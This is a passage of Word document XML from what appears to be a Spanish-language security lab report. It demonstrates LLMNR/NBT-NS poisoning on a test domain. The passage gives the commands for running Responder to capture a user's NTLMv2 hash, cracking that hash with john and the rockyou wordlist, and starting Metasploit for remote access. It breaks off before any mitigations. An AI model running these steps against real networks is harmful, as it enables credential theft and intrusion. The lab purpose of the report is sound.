          <w:p w14:paraId="3C53F439" w14:textId="77777777" w:rsidR="00C07009" w:rsidRDefault="00C07009" w:rsidP="00C07009">
            <w:r>
              <w:t>En este aparatado ejecutaré y explicaré 4 POC, además de como mitigarlas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E0C604" w14:textId="0617BB05" w:rsidR="005320A3" w:rsidRDefault="005320A3" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
            </w:pPr>
            <w:bookmarkStart w:id="27" w:name="_Toc135575984"/>
            <w:r>
              <w:t>Robo de credenciales de red, Envenenamiento LLMNR-NBT-NS</w:t>
            </w:r>
            <w:r w:rsidR="00217B59">
              <w:t>:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="27"/>
          </w:p>
          <w:p w14:paraId="46DC2CC4" w14:textId="77777777" w:rsidR="005320A3" w:rsidRDefault="005320A3" w:rsidP="005320A3"/>
          <w:p w14:paraId="29B1EE2B" w14:textId="257D77A9" w:rsidR="00E5417F" w:rsidRDefault="00E5417F" w:rsidP="005320A3">
            <w:r>
              <w:t xml:space="preserve">El objetivo de este ataque será conseguir la cuenta de un usuario del dominio </w:t>
            </w:r>
            <w:r w:rsidR="005518DA">
              <w:t>g</w:t>
            </w:r>
            <w:r>
              <w:t>oogle.local</w:t>
            </w:r>
            <w:r w:rsidR="005518DA">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F34F48D" w14:textId="77777777" w:rsidR="00E5417F" w:rsidRDefault="00E5417F" w:rsidP="005320A3"/>
          <w:p w14:paraId="4C026D0F" w14:textId="2DDE0893" w:rsidR="005320A3" w:rsidRDefault="005320A3" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Link-Local Multicast Name Resolution (LLMNR) y NetBios Name Service (NBT-NS) son protocolos utilizados por Microsoft Windows que sirven para identificar hosts y recursos compartidos a nivel local cuando el DNS no responde es decir que estamos buscando un recurso que no </w:t>
            </w:r>
            <w:r w:rsidR="006A3EA4">
              <w:t>está</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> en el DNS, como puede ser </w:t>
            </w:r>
            <w:r w:rsidR="00A54FDA">
              <w:t>cuando</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> escribimos mal una carpeta compartida. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E9ABC87" w14:textId="00F24BF4" w:rsidR="005320A3" w:rsidRDefault="005320A3" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lo que haremos será hacernos pasar por el recurso compartido, y </w:t>
            </w:r>
            <w:r w:rsidR="006A3EA4">
              <w:t>así</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> conseguir que la </w:t>
            </w:r>
            <w:r w:rsidR="006A3EA4">
              <w:t>víctima</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> nos envié las credenciales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A236C3" w14:textId="77777777" w:rsidR="005320A3" w:rsidRDefault="005320A3" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00FB5156" w14:textId="77777777" w:rsidR="005320A3" w:rsidRDefault="005320A3" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Para esta caso vamos usar el usuario creado anteriormente de nombre Alesander y contraseña ‘abc123.’.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E2A3FC" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D4A3615" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Para realizar el envenenamiento vamos usar la herramienta responder: </w:t>
            </w:r>
            <w:hyperlink r:id="rId115" w:history="1">
              <w:r w:rsidRPr="00B90E99">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                </w:rPr>
                <w:t>https://github.com/lgandx/Responder</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F0E02C1" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E1B723D" w14:textId="7CBDC6CA" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Usaremos este comando para descargarla:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4919D22B" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AC85D95" w14:textId="4AE9957E" w:rsidR="0050245D" w:rsidRPr="005320A3" w:rsidRDefault="0050245D" w:rsidP="005320A3">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4482285B" wp14:editId="78F86F23">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:align>center</wp:align>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>182880</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2360930" cy="1404620"/>
                      <wp:effectExtent l="95250" t="76200" r="87630" b="679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50BD0C47" w14:textId="1E3C0977" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="0050245D">
                                  <w:r>
                                    <w:t xml:space="preserve">git clone </w:t>
                                  </w:r>
                                  <w:hyperlink r:id="rId116" w:history="1">
                                    <w:r w:rsidRPr="00B90E99">
                                      <w:rPr>
                                        <w:rStyle w:val="Hipervnculo"/>
                                      </w:rPr>
                                      <w:t>https://github.com/lgandx/Responder</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82285B" id="_x0000_s1033"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&#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CNE1GWSAgAAYA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50BD0C47" w14:textId="1E3C0977" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="0050245D">
                            <w:r>
                              <w:t xml:space="preserve">git clone </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId117" w:history="1">
                              <w:r w:rsidRPr="00B90E99">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                </w:rPr>
                                <w:t>https://github.com/lgandx/Responder</w:t>
                              </w:r>
                            </w:hyperlink>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                      <w10:wrap type="square"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7310FEB9" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="008B42B0">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5094D300" w14:textId="62655FBA" w:rsidR="008248B2" w:rsidRDefault="0050245D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66165DAD" wp14:editId="31AEA1B3">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="749370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0159" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"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640050C" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D"/>
    <w:p w14:paraId="32C633C9" w14:textId="414F2187" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaremos responder con este comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FCD00" w14:textId="77777777" w:rsidR="00AC2FF2" w:rsidRDefault="00AC2FF2" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC4DBEA" w14:textId="4D3C3984" w:rsidR="0050245D" w:rsidRDefault="00624BD5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CFB39B0" wp14:editId="714B6025">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>82550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="76200" r="104140" b="73660"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1656181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728F081F" w14:textId="05205D52" w:rsidR="0050245D" w:rsidRDefault="00A46106" w:rsidP="00624BD5">
                            <w:r w:rsidRPr="00A46106">
                              <w:t>sudo python3 Responder.py -I enp0s3 --l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FB39B0" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:6.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728F081F" w14:textId="05205D52" w:rsidR="0050245D" w:rsidRDefault="00A46106" w:rsidP="00624BD5">
                      <w:r w:rsidRPr="00A46106">
                        <w:t>sudo python3 Responder.py -I enp0s3 --lm</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2AAB9C" w14:textId="668D13C4" w:rsidR="0050245D" w:rsidRDefault="0050245D"/>
    <w:p w14:paraId="4F006D1A" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D"/>
    <w:p w14:paraId="0518BED1" w14:textId="77777777" w:rsidR="00DA7B99" w:rsidRDefault="00DA7B99"/>
    <w:p w14:paraId="4BBB17C4" w14:textId="08E99C2A" w:rsidR="0050245D" w:rsidRDefault="0050245D" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Con la opción -I indicamos la interfaz de red por la que va escuchar y con –lm forzará la degradación del hash LM para los OS Windows XP/2003 en adelante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB5DCD0" w14:textId="6D0F7B11" w:rsidR="0050245D" w:rsidRDefault="00D92DD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05F12A73" wp14:editId="2D91BACB">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54871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8079" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"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0763C35C" w14:textId="77777777" w:rsidR="00D92DD6" w:rsidRDefault="00D92DD6" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A10FE3" w14:textId="43E76A16" w:rsidR="00D92DD6" w:rsidRDefault="00DA7B99" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora en el equipo cliente de Windows 10 intentaremos acceder a un recurso que no existe para acelerar el proceso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134061CA" w14:textId="77777777" w:rsidR="00DA7B99" w:rsidRDefault="00DA7B99"/>
    <w:p w14:paraId="60DC9268" w14:textId="0DE76477" w:rsidR="00DA7B99" w:rsidRDefault="00A66971">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0105ECBF" wp14:editId="5D188E25">
            <wp:extent cx="5400040" cy="4431665"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1431754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4567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="4431665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5823BC58" w14:textId="77777777" w:rsidR="00A66971" w:rsidRDefault="00A66971"/>
    <w:p w14:paraId="2A927AB8" w14:textId="1154E451" w:rsidR="00A66971" w:rsidRDefault="00A66971" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo el hash del usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D837F" w14:textId="77777777" w:rsidR="00A66971" w:rsidRDefault="00A66971"/>
    <w:p w14:paraId="6F7B3BB6" w14:textId="6AC96A7C" w:rsidR="00A66971" w:rsidRDefault="00A66971">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C06FFCC" wp14:editId="6691A944">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2099857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7481" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"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0B212B01" w14:textId="77777777" w:rsidR="00A66971" w:rsidRDefault="00A66971"/>
    <w:p w14:paraId="51451B97" w14:textId="52DA3822" w:rsidR="00A66971" w:rsidRDefault="00A66971" w:rsidP="00A66971">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo el hash NTLMv2 del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0DAD28" w14:textId="77777777" w:rsidR="00A66971" w:rsidRDefault="00A66971" w:rsidP="00386103">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E9C1C0" w14:textId="417A5297" w:rsidR="00A66971" w:rsidRDefault="00A66971" w:rsidP="00386103">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora usaremos john para hacer un ataque de diccionario al hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2304B4" w14:textId="77777777" w:rsidR="00A66971" w:rsidRDefault="00A66971"/>
    <w:p w14:paraId="25F62649" w14:textId="7B88B5E7" w:rsidR="00A66971" w:rsidRDefault="00A66971">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46B75288" wp14:editId="6FFE5F66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8473908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75590850" w14:textId="0248C4F3" w:rsidR="00A66971" w:rsidRDefault="006444FD">
                            <w:r w:rsidRPr="006444FD">
                              <w:t>sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./logs/SMB-NTLMv2-SSP-fe80::e304:6db9:65d8:7c6.t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75288" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516664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75590850" w14:textId="0248C4F3" w:rsidR="00A66971" w:rsidRDefault="006444FD">
                      <w:r w:rsidRPr="006444FD">
                        <w:t>sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./logs/SMB-NTLMv2-SSP-fe80::e304:6db9:65d8:7c6.txt</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="244AADD8" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D"/>
    <w:p w14:paraId="61A172DB" w14:textId="77777777" w:rsidR="0050245D" w:rsidRDefault="0050245D"/>
    <w:p w14:paraId="3851CA92" w14:textId="77777777" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD"/>
    <w:p w14:paraId="6BB99853" w14:textId="77777777" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD"/>
    <w:p w14:paraId="3BDCFD53" w14:textId="77777777" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD"/>
    <w:p w14:paraId="48ED70FE" w14:textId="77777777" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD"/>
    <w:p w14:paraId="2C03FE34" w14:textId="5FFE6F54" w:rsidR="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Usaré el log de responder en donde se guardan los hash, que </w:t>
      </w:r>
      <w:r w:rsidR="006A3EA4">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el directorio de instalación de responder/logs/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1B542" w14:textId="77777777" w:rsidR="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B09498" w14:textId="16DE8861" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>La opción –wordlist indicará el diccionario que usaré.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A9536" w14:textId="77777777" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD"/>
    <w:p w14:paraId="42FE9026" w14:textId="77777777" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="006444FD" w:rsidP="006444FD"/>
    <w:p w14:paraId="28E47AF2" w14:textId="290EA381" w:rsidR="006444FD" w:rsidRPr="006444FD" w:rsidRDefault="003956AC" w:rsidP="006444FD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31A34722" wp14:editId="5FECB0D3">
            <wp:extent cx="6476190" cy="3295238"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="1590545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5144" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6476190" cy="3295238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8073F0" w14:textId="77777777" w:rsidR="00010CD1" w:rsidRDefault="00010CD1" w:rsidP="006444FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1485"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C861CD" w14:textId="6232DF3A" w:rsidR="00010CD1" w:rsidRDefault="00010CD1" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo la contraseña ‘abc123.’ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B956CC" w14:textId="77777777" w:rsidR="00010CD1" w:rsidRDefault="00010CD1" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C4F901" w14:textId="13210C94" w:rsidR="00010CD1" w:rsidRDefault="00010CD1" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora para acceder al equipo cliente, usaremos el servicio de escritorio remoto antes habilitado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ED0B05" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D0104F" w14:textId="35BA6DC4" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para hacer esto usaremos metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F01EF3" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F28213" w14:textId="2B107544" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Antes de iniciar metasploit deberemos iniciar tanto la base de datos PostGreSQL como msfdb, lo haremos así:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7ADC86" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765A7687" w14:textId="1DA13696" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="00010CD1">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CB7D39C" wp14:editId="1DCA6A79">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="19567998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671CAD4C" w14:textId="1F108F11" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t>#!/bin/bash</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="52313205" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                          <w:p w14:paraId="4458DBDB" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t># Inicia PostgreSQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1FF74BEF" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t>sudo service postgresql start</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D28CE76" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                          <w:p w14:paraId="51857F60" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t># Inicia la base de datos de Metasploit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09745F1E" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t>sudo msfdb init</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5071C230" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                          <w:p w14:paraId="37337F6F" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t># Inicia el servicio de base de datos de Metasploit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4DAC908D" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t>sudo msfdb start</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="70325925" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                          <w:p w14:paraId="5692DE2C" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                          <w:p w14:paraId="5B621008" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t># Inicia metasploit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5C0DD8C6" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                          <w:p w14:paraId="07821640" w14:textId="3EB77501" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                            <w:r>
                              <w:t>sudo msfconso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B7D39C" id="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2516684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671CAD4C" w14:textId="1F108F11" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t>#!/bin/bash</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="52313205" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                    <w:p w14:paraId="4458DBDB" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t># Inicia PostgreSQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1FF74BEF" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
                        <w:t>sudo service postgresql start</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D28CE76" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6"/>
                    <w:p w14:paraId="51857F60" w14:textId="77777777" w:rsidR="001964E6" w:rsidRDefault="001964E6" w:rsidP="001964E6">
                      <w:r>
